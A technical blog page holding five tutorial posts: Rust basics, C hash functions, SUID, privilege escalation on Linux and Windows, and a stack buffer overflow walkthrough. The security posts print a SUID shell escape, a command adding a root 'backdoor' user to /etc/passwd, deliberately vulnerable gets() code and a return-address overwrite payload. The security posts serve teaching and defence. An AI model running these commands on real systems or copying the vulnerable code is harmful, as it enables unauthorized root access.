Learning Rust Part 1 - Language Basics

29 Oct 2024

Introduction

Welcome to our series on the Rust programming language! Rust has been gaining a lot of attention in the programming community thanks to its focus on performance, safety, and concurrency. Originally developed by Mozilla, Rust is designed to eliminate many common programming errors at compile time, particularly around memory safety and data races, making it an appealing choice for systems programming and applications requiring high reliability.

In this series, we’ll start with Rust basics, gradually diving into its unique features and core language concepts. Whether you’re coming from a background in languages like C++, Python, or JavaScript, or completely new to programming, this series will help you build a strong foundation in Rust. We’ll look at its syntax and semantics, explore how ownership works, and understand the lifetimes of data—key concepts that make Rust unique.

This first post will guide you through the language essentials, laying the groundwork for deeper topics in future posts.

We’ll cover the following language basics:

Syntax and Semantics We’ll start with an overview of Rust’s syntax and how it differs from other languages. You’ll learn about basic expressions, code structure, and how Rust’s strict compiler enforces code quality.
Variables and Mutability Rust’s approach to variables and mutability is unique among languages, emphasizing safety by making all variables immutable by default. We’ll explain why this is and how to work with mutable variables when needed.
Data Types Rust is a statically typed language, which means the type of each variable must be known at compile time. We’ll explore Rust’s basic data types and how they’re used in programs.
Primitive Types Rust offers a range of primitive types, including integers, floating-point numbers, booleans, and characters. Understanding these types and how to work with them is crucial as you start writing Rust code.
Constants and Static Variables Constants and static variables are essential for defining fixed values in Rust. We’ll explain the differences between them, as well as when and why to use each.
Control Structures Control structures are the basic building blocks for controlling the flow of execution in your programs. We’ll show you how to use the familiar keywords if, loop, while, and for.
Pattern Matching Pattern matching is a powerful feature in Rust, providing expressive syntax for conditional branching. We’ll show you how to use the match statement and other forms of pattern matching effectively.
Functions and Closures Finally, we’ll cover functions and closures. Rust’s functions are straightforward, but closures (anonymous functions) bring flexibility to Rust’s syntax, especially for functional programming patterns.

Each section in this post is designed to build on the last, creating a comprehensive introduction to the Rust language’s basics. By the end, you’ll have a solid understanding of Rust’s core language features and a foundation to explore more advanced concepts in subsequent posts.

Syntax and Semantics

Basic Program Structure

Every Rust program begins execution in a function named main. Unlike some languages where a main function is optional, Rust requires fn main() as an entry point.

fn main() {
    println!("Hello, world!");
}

Breaking It Down

fn defines a function, followed by the function name main.
() indicates that main takes no parameters in this example.
Curly braces {} are used to define the function’s scope.
println! is a macro that prints text to the console, with a ! indicating it’s a macro rather than a function. Rust macros are powerful, but for now, think of println! as equivalent to print or printf in other languages.

Expressions and Statements

Rust is an expression-based language, which means that many parts of the code return a value. For example, the final line of a block (without a semicolon) can act as a return value:

fn add_one(x: i32) -> i32 {
    x + 1 // No semicolon, so this returns the value of `x + 1`
}

Expressions (like x + 1 above) return a value and don’t end in a semicolon.
Statements perform actions but don’t return a value, often ending with a semicolon.

Rust’s expression-based nature allows for concise and functional-looking code, as shown below:

let result = if x > 0 { x } else { -x }; // Inline expression in an `if` statement

Enforced Code Quality: Compiler Strictness

Rust’s compiler is notoriously strict, which is a feature, not a bug! This strictness catches common mistakes and enforces safe memory practices. Here’s how it affects code structure and quality:

Unused Variables: The compiler warns about unused variables, nudging you to write clean, intentional code.

let x = 42; // Warning if `x` is unused

You can silence these warnings by prefixing variables with an underscore:

let _x = 42;

Immutable by Default: Variables are immutable unless explicitly marked with mut, encouraging safer programming patterns.

let mut counter = 0; // `counter` can now be modified
counter += 1;

Type Inference with Explicit Typing Encouragement: Rust’s compiler can infer types, but you can (and sometimes should) specify them for clarity and error prevention.

let count: i32 = 10; // Explicit type annotation for clarity

Error Messages: Rust’s Friendly Compiler

Rust’s compiler is known for its friendly and informative error messages. When your code doesn’t compile, Rust will often give suggestions or hints on how to fix it. For example, a typo in a variable name might prompt an error message with suggestions for the correct spelling.

fn main() {
    let x = 10;
    println!("Value of x: {}", y); 
}

The code above will have the compiler emitting messages like this:

-> src/main.rs:5:32
  |
5 |     println!("Value of x: {}", y); 
  |                                ^ help: a local variable with a similar name exists: `x`

Rust’s insistence on safe code often means dealing with the compiler more than in other languages. However, this leads to fewer runtime errors and safer, more reliable programs.

Comments in Rust

Comments in Rust are straightforward and follow conventions you might know from other languages.

Single-line comments use //.

// This is a single-line comment

Multi-line comments use /* */.

/* This is a
   multi-line comment */

Rust also has documentation comments that generate HTML documentation for code, using /// before functions or modules.

/// This function adds one to the input
fn add_one(x: i32) -> i32 {
    x + 1
}

Data Types

Rust has a rich type system designed to prevent errors and ensure safety. Every variable in Rust has a type, either assigned explicitly or inferred by the compiler.

Scalar Types

Integer Types: i8, i16, i32, i64, i128, isize (signed); u8, u16, u32, u64, u128, usize (unsigned).

let x: i32 = -10; // 32-bit signed integer
let y: u8 = 255;  // 8-bit unsigned integer

Floating Point Types: f32 (single-precision), f64 (double-precision).

let a: f64 = 3.1415;
let b: f32 = 2.5;

Boolean Type: bool, which has two values, true and false.

let is_active: bool = true;

Character Type: char, representing a single Unicode scalar value.

let letter: char = 'A';
let emoji: char = '😊';

Compound Types

Tuples: Group multiple values of potentially different types

let person: (&str, i32) = ("Alice", 30);

Arrays: Fixed-size lists of values of a single type.

let numbers: [i32; 3] = [1, 2, 3];

Constants and Static Variables

Constants

Constants are immutable values defined with const and are global within the scope they’re declared in. Constants must have explicit types and are evaluated at compile time.

const PI: f64 = 3.14159;

Static Variables

Static variables are similar to constants but have a fixed memory address. They can be mutable (with static mut), though this is unsafe.

static VERSION: &str = "1.0";

Control Structures

Rust has similar control structures to C and C++, but with a few distinct Rust-specific behaviors and syntax nuances. Here’s a quick rundown:

if: Works similarly to C/C++ but must have a boolean condition (no implicit integer-to-boolean conversions).

let number = 5;
if number > 0 {
    println!("Positive");
} else if number < 0 {
    println!("Negative");
} else {
    println!("Zero");
}

loop: Rust’s equivalent to while(true). It’s an infinite loop but can return values using the break keyword.

let mut count = 0;
let result = loop {
    count += 1;
    if count == 10 {
        break count * 2;
    }
};
println!("Result: {}", result);

while: Standard while loop as in C.

let mut x = 0;
while x < 5 {
    println!("x is: {}", x);
    x += 1;
}

for: Rust’s for loop is typically used with ranges or iterators (no traditional C-style for loop).

for i in 0..5 {
    println!("i is: {}", i);
}

The 0..5 syntax creates a range from 0 to 4. You can also use 0..=5 for an inclusive range from 0 to 5.

Pattern Matching

Rust’s match statement is a powerful control-flow construct that can deconstruct enums, arrays, and tuples.

Using Match with Integers

let number = 7;

match number {
    1 => println!("One"),
    2 | 3 | 5 | 7 => println!("Prime"),
    _ => println!("Other"),
}

Matching with Enums

Pattern matching is particularly useful with enums, as it enables exhaustive handling of each variant.

enum Color {
    Red,
    Green,
    Blue,
}

fn print_color(color: Color) {
    match color {
        Color::Red => println!("Red"),
        Color::Green => println!("Green"),
        Color::Blue => println!("Blue"),
    }
}

Destructuring in Patterns

Rust allows destructuring in match expressions to work with complex data types.

let pair = (1, 2);

match pair {
    (0, _) => println!("First is zero"),
    (_, 0) => println!("Second is zero"),
    _ => println!("No zeros"),
}

Functions and Closures

Functions and closures are both core components of Rust’s programming model.

Functions

Functions are defined with fn and require explicit types for all parameters. Optionally, a function can return a value.

fn add(x: i32, y: i32) -> i32 {
    x + y
}

Closures

Closures are anonymous functions that can capture their environment, and they are commonly used for iterators and callback functions.

let add = |a: i32, b: i32| a + b;
println!("Result: {}", add(5, 10));

Closures infer parameter and return types, but they can also be explicitly typed if needed.

Summary

Rust’s syntax is familiar yet refined, with an expression-oriented structure that keeps code concise. Rust’s strict compiler catches potential issues early, helping you write robust code from the beginning. With these basics, you’ll be ready to dive deeper into Rust’s core features, like variables, mutability, and ownership.

Simple Hashing Algorithms

26 Oct 2024

Introduction

Hash functions are essential in computer science, widely used in data structures, cryptography, and applications like file integrity checks and digital signatures. This post will explore a few well-known hash functions: djb2, Jenkins, Murmur3, and FNV-1a. We’ll discuss each function’s approach and use cases, then dive into sample C implementations for each.

What is a Hash Function?

In brief, a hash function takes input data (e.g., a string) and returns a fixed-size integer, or “hash,” that represents the original data. Ideal hash functions distribute data uniformly, minimizing collisions (when different inputs generate the same hash value). While cryptographic hash functions like SHA-256 prioritize security, our focus here will be on non-cryptographic hashes for tasks such as data lookup and unique identifier generation.

djb2

The djb2 hash function, designed by Daniel J. Bernstein, is a simple yet effective algorithm for hashing strings. Its operation is lightweight, using bit shifts and additions, making it fast and suitable for many non-cryptographic purposes. The main advantage of djb2 lies in its simplicity, which is also why it is commonly used in hash table implementations.

Code

/**
 * @brief Hashes a string using the djb2 algorithm
 * @param str The string to hash
 * @return The hash of the string
 */
uint64_t ced_hash_djb2(const void *key, size_t len) {
    uint64_t hash = 5381;
    const unsigned char *str = key;

    while (len--) {
        hash = ((hash << 5) + hash) + *str++;
    }

    return hash;
}

Explanation

In djb2, we initialize the hash with 5381 and iterate over each character of the string. The main hashing logic is hash = ((hash << 5) + hash) + *str++, which essentially combines shifts and additions for a computationally light transformation.

Jenkins Hash

The Jenkins hash function, created by Bob Jenkins, is popular for its performance and quality of distribution. Jenkins functions are commonly used for hash tables and are generally effective at handling common hashing requirements without high computational overhead.

Code

/**
 * @brief Hashes a string using the Jenkins algorithm
 * @param key The key to hash
 * @param length The length of the key
 * @return The hash of the string
 */
uint32_t ced_hash_jenkins(const void *key, size_t length) {
    uint32_t hash = 0;
    const uint8_t *data = (const uint8_t *)key;

    for (size_t i = 0; i < length; ++i) {
        hash += data[i];
        hash += (hash << 10);
        hash ^= (hash >> 6);
    }

    hash += (hash << 3);
    hash ^= (hash >> 11);
    hash += (hash << 15);

    return hash;
}

Explanation

In this implementation, each byte of the input affects the entire hash state via a series of shifts and XORs. These bitwise operations mix the bits thoroughly, helping reduce the chances of hash collisions, especially for small or repetitive data inputs.

Murmur3

Murmur3 is part of a family of hash functions known for their speed and good distribution characteristics. Designed by Austin Appleby, Murmur3 performs exceptionally well on large datasets and is commonly used in database indexing, distributed systems, and other applications where hash quality and performance are paramount.

Code

/**
 * @brief Hashes a string using the Murmur3 algorithm
 * @param key The key to hash
 * @param length The length of the key
 * @param seed The seed value for the hash
 * @return The hash of the string
 */
uint32_t ced_hash_murmur(const void *key, size_t length, uint32_t seed) {
    const uint32_t m = 0x5bd1e995;
    const int r = 24;

    uint32_t hash = seed ^ length;
    const uint8_t *data = (const uint8_t *)key;

    while (length >= 4) {
        uint32_t k = *(uint32_t *)data;

        k *= m;
        k ^= k >> r;
        k *= m;

        hash *= m;
        hash ^= k;

        data += 4;
        length -= 4;
    }

    switch (length) {
        case 3: hash ^= data[2] << 16;
        case 2: hash ^= data[1] << 8;
        case 1: hash ^= data[0];
            hash *= m;
    }

    hash ^= hash >> 13;
    hash *= m;
    hash ^= hash >> 15;

    return hash;
}

Explanation

Murmur3 processes input in 4-byte chunks, applying a seed-based hashing operation with bit shifts to achieve randomness. This function is optimized for speed and provides excellent performance, particularly in scenarios where uniform hash distribution is critical.

FNV-1a

The FNV-1a hash is another widely used, fast, non-cryptographic hash function. It is well-known for its simplicity and reasonable distribution properties. FNV-1a is often used for smaller data structures like hash tables and is compatible with both small and large datasets.

/**
 * @brief Hashes a string using the FNV1a algorithm
 * @param key The key to hash
 * @param length The length of the key
 * @return The hash of the string
 */
uint32_t ced_hash_fnv1a(const void *key, size_t length) {
    const uint32_t offset_basis = 2166136261;
    const uint32_t prime = 16777619;

    uint32_t hash = offset_basis;
    const uint8_t *data = (const uint8_t *)key;

    for (size_t i = 0; i < length; ++i) {
        hash ^= data[i];
        hash *= prime;
    }

    return hash;
}

Explanation

FNV-1a initializes a hash value with an offset basis and iterates over each byte, XORing it with the hash and then multiplying by a prime number. This operation sequence yields a well-distributed hash while maintaining simplicity.

Summary

Each of the four hash functions reviewed here has distinct characteristics:

djb2: Simple and efficient, suitable for smaller data and hash tables.
Jenkins: Offers good distribution with minimal computation, ideal for hash tables.
Murmur3: Fast and optimized for larger data, making it ideal for database indexing and distributed applications.
FNV-1a: Simple and widely used, especially in situations where lightweight and straightforward hash computation is required.

Choosing the right hash function depends on the specific requirements of your application, particularly the trade-offs between speed, distribution quality, and memory usage. The implementations shared here provide a starting point for integrating efficient hashing techniques in C.

Understanding SUID

25 Oct 2024

Introduction

In the world of Linux security, SUID (Set User ID) is a powerful but potentially dangerous feature that controls privilege escalation. This article will walk through how SUID works, illustrate its effects with a C program example, and explore how improper handling of SUID binaries can lead to privilege escalation.

What is SUID?

SUID, or Set User ID, is a special permission flag in Unix-like operating systems that allows a user to execute a file with the permissions of the file’s owner, rather than their own. This is particularly useful when certain tasks require elevated privileges. For example, the passwd command uses SUID to allow any user to change their password, though the actual file manipulations need root access.

SUID permission can be set using the chmod command with the octal value 4 in front of the file permissions. A SUID binary might look something like this in a directory listing:

-rwsr-xr-x 1 root    root      16000 Oct 25 21:37 suid_binary

The s in the permission string indicates that the SUID bit is set.

Finding SUID Binaries

SUID binaries can be located with the find command. This is useful both for security auditing and for understanding which executables can perform actions with elevated privileges.

find / -perm -u=s -type f 2>/dev/null

This command searches the entire filesystem for files that have the SUID bit set. Be cautious with these binaries, as any misconfiguration can expose the system to privilege escalation.

Building a Program to Understand SUID

Let’s construct a simple C program to see the effects of SUID in action and learn how real and effective user IDs (UIDs) behave.

Here’s our initial program, which will print both the Real UID (RUID) and the Effective UID (EUID). These IDs help determine the permissions available during program execution:

#include <stdio.h>
#include <unistd.h>

int main() {
    printf("Real UID     : %d\n", getuid());
    printf("Effective UID: %d\n", geteuid());

    return 0;
}

To compile the program, use:

gcc suid_example.c -o suid_example

On the first run of this program, it’ll pick up the same id (the current executing user) for both the real and effective UID:

$ ./suid_example

Real UID     : 1000
Effective UID: 1000

We can escalate these privileges here through the use of sudo:

sudo ./suid_example
Real UID     : 0
Effective UID: 0

Using sudo is cheating though. We want to demonstrate SUID.

Adding SUID

We’ll set the program’s SUID bit so it can be run with elevated privileges:

sudo chown root:root suid_example
sudo chmod 4755 suid_example

If we re-run this program now, our real and effective UIDs are different:

$ ./suid_example

Real UID     : 1000
Effective UID: 0

Now, our Effective UID (EUID) is 0, meaning we have root privileges, while the Real UID (RUID) remains our original user ID.

Adding setuid

Calling setuid(0) explicitly sets the Real UID and Effective UID to 0, making the user a superuser. This step is often necessary to maintain root access throughout the program execution.

#include <stdio.h>
#include <unistd.h>

int main() {
    printf(" ---- before ---- \n");
    printf("Real UID     : %d\n", getuid());
    printf("Effective UID: %d\n", geteuid());

    setuid(0);

    printf(" ---- after ---- \n");
    printf("Real UID     : %d\n", getuid());
    printf("Effective UID: %d\n", geteuid());

    return 0;
}

Now that we have setuid in place, executing this program as our standard (1000) user gives us this result:

$ ./suid_example

 ---- before ---- 
Real UID     : 1000
Effective UID: 0
 ---- after ---- 
Real UID     : 0
Effective UID: 0

With this call, both the Real and Effective UID will be set to 0, ensuring root-level privileges throughout the execution.

Security Implications of SUID

SUID binaries, when not managed carefully, can introduce security vulnerabilities. Attackers can exploit misconfigured SUID programs to gain unauthorized root access. A few best practices include:

Minimizing SUID Binaries: Only use SUID where absolutely necessary, and regularly audit the system for SUID binaries.
Code Review: Ensure that all SUID programs are thoroughly reviewed for security vulnerabilities, particularly around system calls like system(), which could potentially be hijacked.

Conclusion

In this post, we explored how SUID works, implemented a program to observe its effects on Real and Effective UIDs, and demonstrated the power of privilege escalation. While SUID is a useful tool for certain applications, it must be carefully managed to avoid security risks. By understanding SUID, Linux administrators and developers can better protect their systems against privilege escalation attacks.

Privilege Escalation Techniques

25 Oct 2024

Introduction

Privilege escalation is a critical concept in cybersecurity, allowing an attacker to gain higher-level access to systems by exploiting specific weaknesses. This process often enables adversaries to move from limited user roles to more powerful administrative or root-level access. In this article, we’ll dive into several common privilege escalation techniques on both Linux and Windows systems, covering methods such as exploiting SUID binaries, weak permissions, and kernel vulnerabilities.

Privilege Escalation

Privilege escalation attacks typically fall into two categories:

Vertical Privilege Escalation: This occurs when a user with lower privileges (e.g., a standard user) gains access to higher privileges (e.g., an admin or root level).
Horizontal Privilege Escalation: In this case, an attacker remains at the same privilege level but accesses resources or areas they typically shouldn’t have access to.

This article focuses on vertical privilege escalation techniques on Linux and Windows systems.

Linux

Exploiting SUID Binaries

In Linux, binaries with the SUID (Set User ID) bit set run with the privileges of the file owner rather than the user executing them. A misconfigured SUID binary owned by root can be exploited to execute code with root privileges.

To locate SUID binaries, use:

find / -perm -u=s -type f 2>/dev/null

Once located, inspect the binary for potential exploitation. Some known binaries like find, vim, or perl can often be exploited with SUID if configured incorrectly. For instance:

# Exploiting a SUID binary with `find`
find . -exec /bin/sh -p \; -quit

Weak File Permissions

Misconfigured permissions can lead to privilege escalation when files essential to the system or owned by higher-privilege users are writable by lower-privilege accounts.

As an example, if an attacker can write to /etc/passwd, they can add a new user with root privileges:

echo 'backdoor:x:0:0::/root:/bin/bash' >> /etc/passwd

Alternatively, a writable /etc/shadow file can enable password manipulation for privileged users.

Kernel Exploits

Linux kernel vulnerabilities are a frequent target for privilege escalation, especially in environments where patching is delayed. It is critical to remain patched and up to day, as well as to keep looking at exploit registers to stay ahead.

Cron Jobs and PATH Exploits

If cron jobs are running scripts with elevated privileges and the script location or PATH variable is misconfigured, attackers may be able to manipulate the outcome.

For instance, if a cron job executes a script owned by root from /tmp, an attacker can replace or edit this script to run commands with root privileges.

Exploiting Misconfigured Capabilities

Linux capabilities allow fine-grained control of specific root privileges for binaries. For instance, a binary with CAP_SETUID capability can change user IDs without full root access. Misconfigured capabilities can be listed with:

getcap -r / 2>/dev/null

Windows

Misconfigured Service Permissions

In Windows, services running as SYSTEM or Administrator can be exploited if lower-privilege users have permission to modify them.

To enumerate services with exploitable permissions, use PowerShell:

Get-Service | Where-Object {$_.StartType -eq 'Automatic'}

Tools like AccessChk can also help determine whether services are misconfigured:

accesschk.exe -uwcqv "username" *

If a service is found to be modifiable, an attacker could replace the executable path with a malicious file to run as SYSTEM.

DLL Hijacking

Windows programs often load DLLs from specific directories in a defined order. If a high-privilege process loads a DLL from a directory where an attacker has write access, they can place a malicious DLL in that directory to achieve code execution at a higher privilege level.

To locate DLL loading paths, analyze process dependencies with tools like Process Monitor.

Weak Folder Permissions

Folder permissions can escalate privileges if users can write to directories containing executables or scripts used by high-privilege processes.

An attacker could replace a legitimate executable in a writable directory to execute malicious code. Check for writable directories in the PATH:

icacls "C:\path\to\directory"

Token Impersonation

In Windows, processes running as SYSTEM can often create impersonation tokens, allowing privileged processes to temporarily “impersonate” another user. Attackers can exploit tokens left by privileged processes to escalate privileges using tools like Incognito or PowerShell.

For instance, PowerShell can be used to list tokens available:

whoami /priv

Kernel Vulnerabilities

In the same way as Linux, Windows will also have kernel exploits that come up on the register. Make sure you’re always patched and on top of the latest issues.

Conclusion

Privilege escalation is a critical step in many cyberattacks, allowing attackers to move from restricted to privileged roles on a system. For both Linux and Windows, attackers leverage vulnerabilities in service configurations, permissions, and system processes to achieve this goal. Security professionals must stay informed about these techniques and patch, configure, and monitor systems to defend against them.

Regularly auditing permissions, keeping software up-to-date, and minimizing the attack surface are essential to mitigating privilege escalation risks. By understanding and addressing these common methods, organizations can significantly reduce the potential for unauthorized privilege escalation.

Understanding Buffer Overrun Exploits

25 Oct 2024

Introduction

Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave unpredictably.

Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory manipulation.

In this post, we’ll take a closer look at buffer overrun exploits, how they work, and explore some real-world code examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also better understand how to mitigate them.

Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.

Password Validator Example

In the following example, the program will ask for input from the user and validate it against a password stored on the server.

void do_super_admin_things() {
  system("/bin/sh");
}

int main(int argc, char *argv[]) {
  if (validate_password()) {
    do_super_admin_things();
  } else {
    printf("ERROR: Bad password\n");
  }

  return 0;
}

do_super_admin_things is our example. It might be an admin shell, or something else. The point is this program is trying to control access to that function by making sure you have the password, first!

The validate_password function is responsible for getting that password in from the outside world. It’s prompts, and then reads from stdin. Note the use of gets().

int validate_password() {
  char password_attempt[64];

  printf("What is the password? ");
  gets(password_attempt);

  return check_password(password_attempt);
}

Warning About `gets`

The usage of gets() here is highly frowned upon because of how insecure it is. Below are notes from the man page for it:

BUGS Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.

The Library Functions Manual makes it clear. It’s such a horrible function security-wise that it has been deprecated from the C99 standard as per §7.26.13:

The gets function is obsolescent, and is deprecated.

If there’s one thing to learn from this section, it’s don’t use gets().

To get this code to compile, I had to relax some of the standard rules and mute certain warnings:

gcc vuln1.c -m32 -std=c89 -Wno-deprecated-declarations -fno-stack-protector -g -o vuln1

Checking the Password

The check_password function reads a file from disk that contains the super-secret password, then compares the attempt to the correct password.

int check_password(char *attempt) {
  char password[256];
  int fd = 0;

  if ((fd = open("./the-password", O_RDONLY)) < 0) {
    perror("open");
    return 0;
  }

  ssize_t read_bytes = read(fd, password, 256);
  
  if (password[read_bytes - 1] == 0xa) {
    password[read_bytes - 1] = 0x0;
  }

  close(fd);

  return strncmp(password, attempt, strlen(password)) == 0;
}

Crashes

Initially, if you provide any normal input, the program behaves as expected:

What is the password? AAAAAAAAAAAA
ERROR: Bad password

But if you push the input a bit further, exceeding the bounds of the password_attempt buffer, you can trigger a crash:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[1]    60406 segmentation fault (core dumped)  ./vuln1

The program crashes due to a segmentation fault. Checking dmesg gives us more information:

$ dmesg | tail -n 5
[ 4442.984159] vuln1[60406]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9a5670 error 14 likely on CPU 19 (core 35, socket 0)
[ 4442.984189] Code: Unable to access opcode bytes at 0x41414117.

Notice the 41414141 pattern. This is significant because it shows that the capital A’s from our input (0x41 in hexadecimal) are making their way into the instruction pointer (ip). The input we provided has overflowed into crucial parts of the stack, including the instruction pointer.

You can verify that 0x41 represents ‘A’ by running the following command:

echo -e "\x41\x41\x41\x41"
AAAA

Controlling the Instruction Pointer

This works because the large input string is overflowing the password_attempt buffer. This buffer is a local variable in the validate_password function, and in the stack, local variables are stored just below the return address. When password_attempt overflows, the excess data overwrites the return address on the stack. Once overwritten, we control what address the CPU will jump to after validate_password finishes.

Maybe, we could find the address of the do_super_admin_things function and simply jump directly to it. In order to do this, we need to find the address. Only the name of the function is available to us in the source code, and the address
of the function is determined at compile time; so we need to lean on some other tools in order to gather this intel.

By using objdump we can take a look inside of the compiled executable and get this information.

objdump -d vuln1

This will decompile the vuln1 program and give us the location of each of the functions. We search for the function that we want (do_super_admin_things):

00001316 <do_super_admin_things>:
    1316:       55                      push   %ebp
    1317:       89 e5                   mov    %esp,%ebp
    1319:       53                      push   %ebx

We find that it’s at address 00001316. We need to take note of this value as we’ll need it shortly.

Now we need to find the spot among that big group of A’s that we’re sending into the input, exactly where the right spot is, where we can inject our address onto the stack. We’ve already got some inside knowledge about our buffer. It’s 64 bytes in length.

We really need a magic mark in the input so we can determine where to send our address in. We can do that with some well known payload data. We re-run the program with our 64 A’s but we also add a pattern of characters afterwards:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFF
[1]    60406 segmentation fault (core dumped)  ./vuln1

This seg faults again, but you can see the BBBBCCCCDDDDEEEEFFFF at the end of the 64 A’s. Looking at the log in dmesg now:

[ 9287.917223] vuln1[62745]: segfault at 45454545 ip 0000000045454545 sp 00000000ffa63b50 error 14 likely on CPU 18 (core 34, socket 0)

The 45454545 tells us which part of the input is being sent in as the return address. \x45 is the E’s

echo -e "\x45\x45\x45\x45"
EEEE

That means that our instruction pointer will start at the E’s.

Prepare the Payload

To make life easier for us, we’ll write a python script that will generate this payload for us. Note that this is using our function address from before.

#!/usr/bin/python
import sys

# fill out the original buffer
payload =  b"A" * 64
# extra pad to skip to where we want our instruction pointer 
payload += b"BBBBCCCCDDDD"
# address of our function "do_super_admin_things"
payload += b"\x16\x13\x00\x00"

sys.stdout.buffer.write(payload)

We can now inject this into the execution of our binary and achieve a shell:

$ (python3 payload.py; cat) | ./vuln1 

ls
input  payload.py  the-password  vuln1	vuln1.c

We use (python3 payload.py; cat) here because of the shell’s handling of file descriptors. Without doing this and simply piping the output, our shell would kill the file descriptors off.

Static vs. Runtime Addresses

When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.

For example, if we inspect the runtime address of 1do_super_admin_things` in GDB, we might see something like:

(gdb) info address do_super_admin_things
Symbol "do_super_admin_things" is at 0x56556326 in a file compiled without debugging.

This differs from the objdump address 0x1326, as it’s been shifted by the base address of the executable (e.g., 0x56555000 in this case). This discrepancy is due to ASLR.

Temporarily Disabling ASLR for Demonstration

To ensure the addresses in objdump match those at runtime, we can temporarily disable ASLR. This makes the program load at consistent addresses, which is useful for demonstration and testing purposes.

To disable ASLR on Linux, run:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Conclusion

In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump, we could inspect static addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.

Disabling ASLR temporarily allowed us to match objdump addresses to those at runtime, making the exploit demonstration clearer. However, this feature highlights why modern systems adopt ASLR: by shifting memory locations each time a program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.

Understanding and practicing secure coding, such as avoiding vulnerable functions like gets() and implementing stack protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices create a layered approach to security, significantly enhancing the resilience of software.

Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.

Older Newer

Cogs and Levers A blog full of technical stuff

Learning Rust Part 1 - Language Basics

Introduction

Syntax and Semantics

Basic Program Structure

Expressions and Statements

Enforced Code Quality: Compiler Strictness

Error Messages: Rust’s Friendly Compiler

Comments in Rust

Data Types

Scalar Types

Compound Types

Constants and Static Variables

Constants

Static Variables

Control Structures

Pattern Matching

Using Match with Integers

Matching with Enums

Destructuring in Patterns

Functions and Closures

Functions

Closures

Summary

Simple Hashing Algorithms

Introduction

What is a Hash Function?

djb2

Code

Explanation

Jenkins Hash

Code

Explanation

Murmur3

Code

Explanation

FNV-1a

Explanation

Summary

Understanding SUID

Introduction

What is SUID?

Finding SUID Binaries

Building a Program to Understand SUID

Adding SUID

Adding setuid

Security Implications of SUID

Conclusion

Privilege Escalation Techniques

Introduction

Privilege Escalation

Linux

Exploiting SUID Binaries

Weak File Permissions

Kernel Exploits

Cron Jobs and PATH Exploits

Exploiting Misconfigured Capabilities

Windows

Misconfigured Service Permissions

DLL Hijacking

Weak Folder Permissions

Token Impersonation

Kernel Vulnerabilities

Conclusion

Understanding Buffer Overrun Exploits

Introduction

Password Validator Example

Warning About gets

Checking the Password

Crashes

Controlling the Instruction Pointer

Prepare the Payload

Static vs. Runtime Addresses

Temporarily Disabling ASLR for Demonstration

Conclusion

Warning About `gets`